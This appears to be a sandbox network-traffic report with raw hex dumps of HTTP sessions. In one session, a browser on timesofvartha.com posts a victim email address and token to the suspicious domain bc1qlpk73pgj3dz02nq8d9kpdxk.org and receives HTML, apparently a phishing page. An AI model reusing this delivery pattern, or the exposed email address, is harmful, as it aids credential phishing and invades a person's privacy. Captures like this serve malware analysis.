                                                                                                                              2024-11-18 16:56:05 UTC1369INData Raw: 65 2e 63 61 6c 6c 28 74 68 69 73 29 3b 72 65 74 75 72 6e 20 74 2e 5f 68 61 73 68 3d 74 68 69 73 2e 5f 68 61 73 68 2e 63 6c 6f 6e 65 28 29 2c 74 7d 7d 29 3b 66 75 6e 63 74 69 6f 6e 20 7a 28 74 2c 65 2c 72 2c 69 2c 6e 2c 6f 2c 73 29 7b 76 61 72 20 63 3d 74 2b 28 65 26 72 7c 7e 65 26 69 29 2b 6e 2b 73 3b 72 65 74 75 72 6e 28 63 3c 3c 6f 7c 63 3e 3e 3e 33 32 2d 6f 29 2b 65 7d 66 75 6e 63 74 69 6f 6e 20 41 28 74 2c 65 2c 72 2c 69 2c 6e 2c 6f 2c 73 29 7b 76 61 72 20 63 3d 74 2b 28 65 26 69 7c 72 26 7e 69 29 2b 6e 2b 73 3b 72 65 74 75 72 6e 28 63 3c 3c 6f 7c 63 3e 3e 3e 33 32 2d 6f 29 2b 65 7d 66 75 6e 63 74 69 6f 6e 20 43 28 74 2c 65 2c 72 2c 69 2c 6e 2c 6f 2c 73 29 7b 76 61 72 20 63 3d 74 2b 28 65 5e 72 5e 69 29 2b 6e 2b 73 3b 72 65 74 75 72 6e 28 63 3c 3c 6f
                                                                                                                              Data Ascii: e.call(this);return t._hash=this._hash.clone(),t}});function z(t,e,r,i,n,o,s){var c=t+(e&r|~e&i)+n+s;return(c<<o|c>>>32-o)+e}function A(t,e,r,i,n,o,s){var c=t+(e&i|r&~i)+n+s;return(c<<o|c>>>32-o)+e}function C(t,e,r,i,n,o,s){var c=t+(e^r^i)+n+s;return(c<<o
                                                                                                                              2024-11-18 16:56:05 UTC1369INData Raw: 6e 63 74 69 6f 6e 28 6e 29 7b 76 61 72 20 74 3d 62 74 2c 65 3d 74 2e 6c 69 62 2c 72 3d 65 2e 57 6f 72 64 41 72 72 61 79 2c 69 3d 65 2e 48 61 73 68 65 72 2c 6f 3d 74 2e 61 6c 67 6f 2c 73 3d 5b 5d 2c 42 3d 5b 5d 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 74 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 6e 2e 73 71 72 74 28 74 29 2c 72 3d 32 3b 72 3c 3d 65 3b 72 2b 2b 29 69 66 28 21 28 74 25 72 29 29 72 65 74 75 72 6e 3b 72 65 74 75 72 6e 20 31 7d 66 75 6e 63 74 69 6f 6e 20 65 28 74 29 7b 72 65 74 75 72 6e 20 34 32 39 34 39 36 37 32 39 36 2a 28 74 2d 28 30 7c 74 29 29 7c 30 7d 66 6f 72 28 76 61 72 20 72 3d 32 2c 69 3d 30 3b 69 3c 36 34 3b 29 74 28 72 29 26 26 28 69 3c 38 26 26 28 73 5b 69 5d 3d 65 28 6e 2e 70 6f 77 28 72 2c 2e 35 29 29 29
                                                                                                                              Data Ascii: nction(n){var t=bt,e=t.lib,r=e.WordArray,i=e.Hasher,o=t.algo,s=[],B=[];!function(){function t(t){for(var e=n.sqrt(t),r=2;r<=e;r++)if(!(t%r))return;return 1}function e(t){return 4294967296*(t-(0|t))|0}for(var r=2,i=0;i<64;)t(r)&&(i<8&&(s[i]=e(n.pow(r,.5)))


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              32192.168.2.1749751172.202.163.200443
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-11-18 16:56:07 UTC306OUTGET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=ePsK7ZCVA7dfvLb&MD=7twsYf23 HTTP/1.1
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Accept: */*
                                                                                                                              User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                              Host: slscr.update.microsoft.com
                                                                                                                              2024-11-18 16:56:08 UTC560INHTTP/1.1 200 OK
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Pragma: no-cache
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              Expires: -1
                                                                                                                              Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                              ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440"
                                                                                                                              MS-CorrelationId: 5c66cb9b-64cb-4873-af13-d532d59c2d94
                                                                                                                              MS-RequestId: 25dca496-dc70-4ebc-aa29-18865e8d44cd
                                                                                                                              MS-CV: 8DiHy3OU5Uq99tBU.0
                                                                                                                              X-Microsoft-SLSClientCache: 1440
                                                                                                                              Content-Disposition: attachment; filename=environment.cab
                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                              Date: Mon, 18 Nov 2024 16:56:07 GMT
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 30005
                                                                                                                              2024-11-18 16:56:08 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 8d 2b 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 5b 49 00 00 14 00 00 00 00 00 10 00 8d 2b 00 00 a8 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 72 4d 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 fe f6 51 be 21 2b 72 4d 43 4b ed 7c 05 58 54 eb da f6 14 43 49 37 0a 02 d2 b9 86 0e 41 52 a4 1b 24 a5 bb 43 24 44 18 94 90 92 52 41 3a 05 09 95 ee 54 b0 00 91 2e e9 12 10 04 11 c9 6f 10 b7 a2 67 9f bd cf 3e ff b7 ff b3 bf 73 ed e1 9a 99 f5 c6 7a d7 bb de f5 3e cf fd 3c f7 dc 17 4a 1a 52 e7 41 a8 97 1e 14 f4 e5 25 7d f4 05 82 82 c1 20 30 08 06 ba c3 05 02 11 7f a9 c1 ff d2 87 5c 1e f4 ed 65 8e 7a 1f f6 0a 40 03 1d 7b f9 83 2c 1c 2f db b8 3a 39 3a 58 38 ba 73 5e
                                                                                                                              Data Ascii: MSCF+D[I+IdrMenvironment.cabQ!+rMCK|XTCI7AR$C$DRA:T.og>sz><JRA%} 0\ez@{,/:9:X8s^
                                                                                                                              2024-11-18 16:56:08 UTC14181INData Raw: 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 26 30 24 06 03 55 04 03 13 1d 4d 69 63 72 6f 73 6f 66 74 20 54 69 6d 65 2d 53 74 61 6d 70 20 50 43 41 20 32 30 31 30 30 1e 17 0d 32 33 31 30 31 32 31 39 30 37 32 35 5a 17 0d 32 35 30 31 31 30 31 39 30 37 32 35 5a 30 81 d2 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 2d 30 2b 06 03 55 04 0b 13 24 4d 69 63 72 6f
                                                                                                                              Data Ascii: UUS10UWashington10URedmond10UMicrosoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100231012190725Z250110190725Z010UUS10UWashington10URedmond10UMicrosoft Corporation1-0+U$Micro


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              33192.168.2.1749750154.216.17.1934436752C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-11-18 16:56:07 UTC520OUTOPTIONS / HTTP/1.1
                                                                                                                              Host: bc1qlpk73pgj3dz02nq8d9kpdxk.org
                                                                                                                              Connection: keep-alive
                                                                                                                              Accept: */*
                                                                                                                              Access-Control-Request-Method: POST
                                                                                                                              Access-Control-Request-Headers: content-type
                                                                                                                              Origin: https://timesofvartha.com
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                              Referer: https://timesofvartha.com/
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              2024-11-18 16:56:08 UTC292INHTTP/1.1 200 OK
                                                                                                                              Date: Mon, 18 Nov 2024 16:56:08 GMT
                                                                                                                              Server: Apache/2.4.52 (Ubuntu)
                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                              Access-Control-Allow-Methods: POST, GET, OPTIONS
                                                                                                                              Access-Control-Allow-Headers: Content-Type
                                                                                                                              Content-Length: 0
                                                                                                                              Connection: close
                                                                                                                              Content-Type: text/html; charset=UTF-8


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              34192.168.2.1749752154.216.17.1934436752C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-11-18 16:56:09 UTC616OUTPOST / HTTP/1.1
                                                                                                                              Host: bc1qlpk73pgj3dz02nq8d9kpdxk.org
                                                                                                                              Connection: keep-alive
                                                                                                                              Content-Length: 83
                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                              Content-Type: application/json
                                                                                                                              Accept: */*
                                                                                                                              Origin: https://timesofvartha.com
                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                              Referer: https://timesofvartha.com/
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              2024-11-18 16:56:09 UTC83OUTData Raw: 7b 22 70 61 72 61 6d 65 74 65 72 22 3a 22 4d 72 65 74 74 69 6e 67 65 72 40 64 63 6e 64 78 2e 63 6f 6d 22 2c 22 74 6f 6b 65 6e 22 3a 22 39 66 61 38 61 35 32 64 2d 35 30 31 30 2d 34 64 38 66 2d 61 36 31 33 2d 37 63 30 33 38 64 62 66 63 62 37 62 22 7d
                                                                                                                              Data Ascii: {"parameter":"Mrettinger@dcndx.com","token":"9fa8a52d-5010-4d8f-a613-7c038dbfcb7b"}
                                                                                                                              2024-11-18 16:56:10 UTC324INHTTP/1.1 200 OK
                                                                                                                              Date: Mon, 18 Nov 2024 16:56:09 GMT
                                                                                                                              Server: Apache/2.4.52 (Ubuntu)
                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                              Access-Control-Allow-Methods: POST, GET, OPTIONS
                                                                                                                              Access-Control-Allow-Headers: Content-Type
                                                                                                                              Vary: Accept-Encoding
                                                                                                                              Connection: close
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              2024-11-18 16:56:10 UTC7868INData Raw: 33 32 34 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 48 54 4d 4c 20 63 6f 6e 74 65 6e 74 20 64 65 6c 69 76 65 72 65 64 20 73 75 63 63 65 73 73 66 75 6c 6c 79 2e 22 2c 22 68 74 6d 6c 22 3a 22 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 5c 22 65 6e 5c 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 5c 22 55 54 46 2d 38 5c 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 5c 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 5c 22 20 68 72 65 66 3d 5c 22 64 61 74 61 3a 69 6d 61 67 65 5c 2f 78 2d 69 63 6f 6e 3b 2c 5c 22 20 74 79 70 65 3d 5c 22 69 6d 61 67 65 5c 2f 78 2d 69 63 6f 6e 5c 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 5c 22 58 2d 55 41 2d 43 6f 6d 70
                                                                                                                              Data Ascii: 324c{"status":"success","message":"HTML content delivered successfully.","html":"<!DOCTYPE html><html lang=\"en\"><head><meta charset=\"UTF-8\"><link rel=\"shortcut icon\" href=\"data:image\/x-icon;,\" type=\"image\/x-icon\"><meta http-equiv=\"X-UA-Comp
                                                                                                                              2024-11-18 16:56:10 UTC5014INData Raw: 61 64 3e 3c 62 6f 64 79 3e 3c 64 69 76 20 69 64 3d 5c 22 6c 6f 61 64 69 6e 67 53 63 72 65 65 6e 5c 22 3e 3c 64 69 76 20 69 64 3d 5c 22 6c 6f 61 64 69 6e 67 4c 6f 67 6f 5c 22 3e 3c 64 69 76 20 69 64 3d 5c 22 63 6f 6e 74 61 69 6e 65 72 5c 22 3e 3c 64 69 76 20 69 64 3d 5c 22 63 6f 6e 74 61 69 6e 65 72 53 68 61 64 6f 77 5c 22 3e 3c 5c 2f 64 69 76 3e 3c 64 69 76 20 69 64 3d 5c 22 6c 6f 67 6f 5c 22 3e 3c 64 69 76 20 69 64 3d 5c 22 66 6c 61 70 43 6f 6e 74 61 69 6e 65 72 5c 22 3e 3c 64 69 76 20 69 64 3d 5c 22 6f 70 65 6e 65 64 46 6c 61 70 5c 22 3e 3c 64 69 76 20 69 64 3d 5c 22 66 6d 61 73 6b 5c 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 5c 22 66 6c 61 70 54 72 69 61 6e 67 6c 65 5c 22 3e 3c 5c 2f 64 69 76 3e 3c 5c 2f 64 69 76 3e 3c 5c 2f 64 69 76 3e 3c 64 69 76 20 69
                                                                                                                              Data Ascii: ad><body><div id=\"loadingScreen\"><div id=\"loadingLogo\"><div id=\"container\"><div id=\"containerShadow\"><\/div><div id=\"logo\"><div id=\"flapContainer\"><div id=\"openedFlap\"><div id=\"fmask\"><div class=\"flapTriangle\"><\/div><\/div><\/div><div i
                                                                                                                              2024-11-18 16:56:10 UTC2INData Raw: 0d 0a
                                                                                                                              Data Ascii:
                                                                                                                              2024-11-18 16:56:10 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              35192.168.2.1749753104.17.24.144436752C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-11-18 16:56:10 UTC645OUTGET /ajax/libs/jquery/3.6.0/jquery.min.js HTTP/1.1
                                                                                                                              Host: cdnjs.cloudflare.com
                                                                                                                              Connection: keep-alive
                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                              Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                              Accept: */*
                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                              Referer: https://timesofvartha.com/
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              2024-11-18 16:56:10 UTC964INHTTP/1.1 200 OK
                                                                                                                              Date: Mon, 18 Nov 2024 16:56:10 GMT
                                                                                                                              Content-Type: application/javascript; charset=utf-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: close
                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                              Cache-Control: public, max-age=30672000
                                                                                                                              ETag: W/"603e8adc-15d9d"
                                                                                                                              Last-Modified: Tue, 02 Mar 2021 18:58:36 GMT
                                                                                                                              cf-cdnjs-via: cfworker/kv
                                                                                                                              Cross-Origin-Resource-Policy: cross-origin
                                                                                                                              Timing-Allow-Origin: *
                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                              CF-Cache-Status: HIT
                                                                                                                              Age: 1021659
                                                                                                                              Expires: Sat, 08 Nov 2025 16:56:10 GMT
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZfD2l1gU6zb%2FL0kPeW4RWlwlngKRcjuyqWyzJPY%2Fm1SrZaGURtEO6BpNbbfQrus%2FptrL02HpLOSqwdrogRJuAn1KlGmVnvH0CHfV7giqE1f7%2B1OLOjGuuD7lCkKS%2F2ONbUfmKzqX"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Strict-Transport-Security: max-age=15780000
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8e497e0b9a66ddae-DFW
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              2024-11-18 16:56:10 UTC405INData Raw: 37 62 65 63 0d 0a 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f
                                                                                                                              Data Ascii: 7bec/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Erro
                                                                                                                              2024-11-18 16:56:10 UTC1369INData Raw: 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 2c 73 3d 74 2e 73 6c 69 63 65 2c 67 3d 74 2e 66 6c 61 74 3f 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 2e 66 6c 61 74 2e 63 61 6c 6c 28 65 29 7d 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 2e 63 6f 6e 63 61 74 2e 61 70 70 6c 79 28 5b 5d 2c 65 29 7d 2c 75 3d 74 2e 70 75 73 68 2c 69 3d 74 2e 69 6e 64 65 78 4f 66 2c 6e 3d 7b 7d 2c 6f 3d 6e 2e 74 6f 53 74 72 69 6e 67 2c 76 3d 6e 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2c 61 3d 76 2e 74 6f 53 74 72 69 6e 67 2c 6c 3d 61 2e 63 61 6c 6c 28 4f 62 6a 65 63 74 29 2c 79 3d 7b 7d 2c 6d 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 65 26 26 22 6e 75 6d 62 65 72 22 21 3d 74
                                                                                                                              Data Ascii: etPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=t
                                                                                                                              2024-11-18 16:56:10 UTC1369INData Raw: 30 29 7d 2c 6c 61 73 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 65 71 28 2d 31 29 7d 2c 65 76 65 6e 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 53 2e 67 72 65 70 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 28 74 2b 31 29 25 32 7d 29 29 7d 2c 6f 64 64 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 53 2e 67 72 65 70 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 74 25 32 7d 29 29 7d 2c 65 71 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 74 68 69 73 2e 6c 65 6e 67 74 68 2c 6e 3d 2b 65 2b 28 65 3c 30 3f 74 3a 30 29 3b 72 65 74 75 72 6e 20
                                                                                                                              Data Ascii: 0)},last:function(){return this.eq(-1)},even:function(){return this.pushStack(S.grep(this,function(e,t){return(t+1)%2}))},odd:function(){return this.pushStack(S.grep(this,function(e,t){return t%2}))},eq:function(e){var t=this.length,n=+e+(e<0?t:0);return
                                                                                                                              2024-11-18 16:56:10 UTC1369INData Raw: 3d 3d 74 2e 63 61 6c 6c 28 65 5b 72 5d 2c 72 2c 65 5b 72 5d 29 29 62 72 65 61 6b 3b 72 65 74 75 72 6e 20 65 7d 2c 6d 61 6b 65 41 72 72 61 79 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 74 7c 7c 5b 5d 3b 72 65 74 75 72 6e 20 6e 75 6c 6c 21 3d 65 26 26 28 70 28 4f 62 6a 65 63 74 28 65 29 29 3f 53 2e 6d 65 72 67 65 28 6e 2c 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 65 3f 5b 65 5d 3a 65 29 3a 75 2e 63 61 6c 6c 28 6e 2c 65 29 29 2c 6e 7d 2c 69 6e 41 72 72 61 79 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 74 3f 2d 31 3a 69 2e 63 61 6c 6c 28 74 2c 65 2c 6e 29 7d 2c 6d 65 72 67 65 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 2b 74 2e 6c 65 6e 67 74 68 2c 72 3d
                                                                                                                              Data Ascii: ==t.call(e[r],r,e[r]))break;return e},makeArray:function(e,t){var n=t||[];return null!=e&&(p(Object(e))?S.merge(n,"string"==typeof e?[e]:e):u.call(n,e)),n},inArray:function(e,t,n){return null==t?-1:i.call(t,e,n)},merge:function(e,t){for(var n=+t.length,r=
                                                                                                                              2024-11-18 16:56:10 UTC1369INData Raw: 7c 21 7e 5d 3f 3d 29 22 2b 4d 2b 22 2a 28 3f 3a 27 28 28 3f 3a 5c 5c 5c 5c 2e 7c 5b 5e 5c 5c 5c 5c 27 5d 29 2a 29 27 7c 5c 22 28 28 3f 3a 5c 5c 5c 5c 2e 7c 5b 5e 5c 5c 5c 5c 5c 22 5d 29 2a 29 5c 22 7c 28 22 2b 49 2b 22 29 29 7c 29 22 2b 4d 2b 22 2a 5c 5c 5d 22 2c 46 3d 22 3a 28 22 2b 49 2b 22 29 28 3f 3a 5c 5c 28 28 28 27 28 28 3f 3a 5c 5c 5c 5c 2e 7c 5b 5e 5c 5c 5c 5c 27 5d 29 2a 29 27 7c 5c 22 28 28 3f 3a 5c 5c 5c 5c 2e 7c 5b 5e 5c 5c 5c 5c 5c 22 5d 29 2a 29 5c 22 29 7c 28 28 3f 3a 5c 5c 5c 5c 2e 7c 5b 5e 5c 5c 5c 5c 28 29 5b 5c 5c 5d 5d 7c 22 2b 57 2b 22 29 2a 29 7c 2e 2a 29 5c 5c 29 7c 29 22 2c 42 3d 6e 65 77 20 52 65 67 45 78 70 28 4d 2b 22 2b 22 2c 22 67 22 29 2c 24 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5e 22 2b 4d 2b 22 2b 7c 28 28 3f 3a 5e 7c 5b
                                                                                                                              Data Ascii: |!~]?=)"+M+"*(?:'((?:\\\\.|[^\\\\'])*)'|\"((?:\\\\.|[^\\\\\"])*)\"|("+I+"))|)"+M+"*\\]",F=":("+I+")(?:\\((('((?:\\\\.|[^\\\\'])*)'|\"((?:\\\\.|[^\\\\\"])*)\")|((?:\\\\.|[^\\\\()[\\]]|"+W+")*)|.*)\\)|)",B=new RegExp(M+"+","g"),$=new RegExp("^"+M+"+|((?:^|[
                                                                                                                              2024-11-18 16:56:10 UTC1369INData Raw: 74 72 69 6e 67 28 31 36 29 2b 22 20 22 3a 22 5c 5c 22 2b 65 7d 2c 6f 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 54 28 29 7d 2c 61 65 3d 62 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 21 30 3d 3d 3d 65 2e 64 69 73 61 62 6c 65 64 26 26 22 66 69 65 6c 64 73 65 74 22 3d 3d 3d 65 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 7d 2c 7b 64 69 72 3a 22 70 61 72 65 6e 74 4e 6f 64 65 22 2c 6e 65 78 74 3a 22 6c 65 67 65 6e 64 22 7d 29 3b 74 72 79 7b 48 2e 61 70 70 6c 79 28 74 3d 4f 2e 63 61 6c 6c 28 70 2e 63 68 69 6c 64 4e 6f 64 65 73 29 2c 70 2e 63 68 69 6c 64 4e 6f 64 65 73 29 2c 74 5b 70 2e 63 68 69 6c 64 4e 6f 64 65 73 2e 6c 65 6e 67 74 68 5d 2e 6e 6f 64 65 54 79 70 65 7d 63 61 74 63 68 28 65 29 7b 48 3d 7b 61 70 70 6c 79 3a 74
                                                                                                                              Data Ascii: tring(16)+" ":"\\"+e},oe=function(){T()},ae=be(function(e){return!0===e.disabled&&"fieldset"===e.nodeName.toLowerCase()},{dir:"parentNode",next:"legend"});try{H.apply(t=O.call(p.childNodes),p.childNodes),t[p.childNodes.length].nodeType}catch(e){H={apply:t
                                                                                                                              2024-11-18 16:56:10 UTC1369INData Raw: 7b 76 61 72 20 72 3d 5b 5d 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 20 65 28 74 2c 6e 29 7b 72 65 74 75 72 6e 20 72 2e 70 75 73 68 28 74 2b 22 20 22 29 3e 62 2e 63 61 63 68 65 4c 65 6e 67 74 68 26 26 64 65 6c 65 74 65 20 65 5b 72 2e 73 68 69 66 74 28 29 5d 2c 65 5b 74 2b 22 20 22 5d 3d 6e 7d 7d 66 75 6e 63 74 69 6f 6e 20 6c 65 28 65 29 7b 72 65 74 75 72 6e 20 65 5b 53 5d 3d 21 30 2c 65 7d 66 75 6e 63 74 69 6f 6e 20 63 65 28 65 29 7b 76 61 72 20 74 3d 43 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 66 69 65 6c 64 73 65 74 22 29 3b 74 72 79 7b 72 65 74 75 72 6e 21 21 65 28 74 29 7d 63 61 74 63 68 28 65 29 7b 72 65 74 75 72 6e 21 31 7d 66 69 6e 61 6c 6c 79 7b 74 2e 70 61 72 65 6e 74 4e 6f 64 65 26 26 74 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 72 65 6d
                                                                                                                              Data Ascii: {var r=[];return function e(t,n){return r.push(t+" ")>b.cacheLength&&delete e[r.shift()],e[t+" "]=n}}function le(e){return e[S]=!0,e}function ce(e){var t=C.createElement("fieldset");try{return!!e(t)}catch(e){return!1}finally{t.parentNode&&t.parentNode.rem
